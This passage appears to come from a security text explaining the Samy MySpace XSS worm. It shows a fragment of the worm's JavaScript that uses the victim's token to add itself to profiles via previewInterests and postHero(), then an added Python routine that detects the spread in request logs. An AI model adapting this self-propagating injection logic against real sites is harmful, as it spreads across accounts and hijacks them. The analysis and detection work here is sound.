// After previewing:
// - grab the "hash" token from the preview page (required to perform
//   the final submission)
// - run postHero() to perform the final submission that adds the
//   worm to the victim.
httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken=' +
myToken, postHero, 'POST',
parameterArrayToParameterString(queryParameterArray));
}
}
}
Note that the function above first checks whether the victim has already been victimized.
If not, it grabs the victim's Mytoken and begins the first step (of two) to add Samy to the
victim's Heroes section, and it injects the script injection and attack code into the victim's
profile page, too. It does so by performing the profile.previewInterests action on
MySpace with the worm code, appropriate friendID, and appropriate Mytoken. The
next step runs postHero(), which grabs a necessary hash token and submits the final
request to add Samy as the victim's hero and add the script injection and attack code to the
victim's profile page.
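A defender's view of the propagation step described above, as an added example that is not from the original text: every newly affected account POSTs the same long field value to profile.previewInterests, so one payload arriving from many accounts in a short window stands out in request logs. The record layout, the `interest` field name, the thresholds, and all sample data are assumptions constructed for illustration.

```python
import hashlib
from collections import defaultdict
from urllib.parse import parse_qs, urlencode, urlsplit

PREVIEW_ACTION = "profile.previewInterests"  # action named in the text above
MIN_FIELD_LEN = 40  # assumption: skip short values that repeat innocently


def find_spreading_payloads(records, window=300, min_accounts=3):
    """Map sha256(field value) -> accounts, for values that at least
    `min_accounts` distinct accounts submitted within `window` seconds.

    records: iterable of (epoch_seconds, account_id, method, url, body).
    """
    seen = defaultdict(list)  # digest -> [(timestamp, account)]
    for ts, account, method, url, body in records:
        query = parse_qs(urlsplit(url).query)
        if method != "POST" or query.get("fuseaction") != [PREVIEW_ACTION]:
            continue
        # Hash each field separately so per-user fields and tokens
        # do not hide a payload that is identical across accounts.
        for values in parse_qs(body).values():
            for value in values:
                if len(value) >= MIN_FIELD_LEN:
                    digest = hashlib.sha256(value.encode()).hexdigest()
                    seen[digest].append((ts, account))

    alerts = {}
    for digest, events in seen.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until it spans <= `window` s.
            while events[end][0] - events[start][0] > window:
                start += 1
            if len({a for _, a in events[start:end + 1]}) >= min_accounts:
                alerts[digest] = sorted({a for _, a in events})
                break
    return alerts


# Constructed sample data: PAYLOAD is a harmless placeholder string.
PAYLOAD = "CONSTRUCTED placeholder standing in for one long repeated block"

def _record(ts, account, text):
    url = f"/index.cfm?fuseaction={PREVIEW_ACTION}&Mytoken=tok{account}"
    return (ts, account, "POST", url, urlencode({"interest": text}))

SAMPLE = [_record(0, 101, PAYLOAD), _record(20, 102, PAYLOAD),
          _record(45, 103, PAYLOAD), _record(55, 101, PAYLOAD),
          _record(50, 104, "I like hiking, long walks and old science fiction")]
```
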
// postHero() grabs the "hash" from the victim's interest preview page and
// performs the final submission to add "samy" (and the worm) to the
// victim's profile page.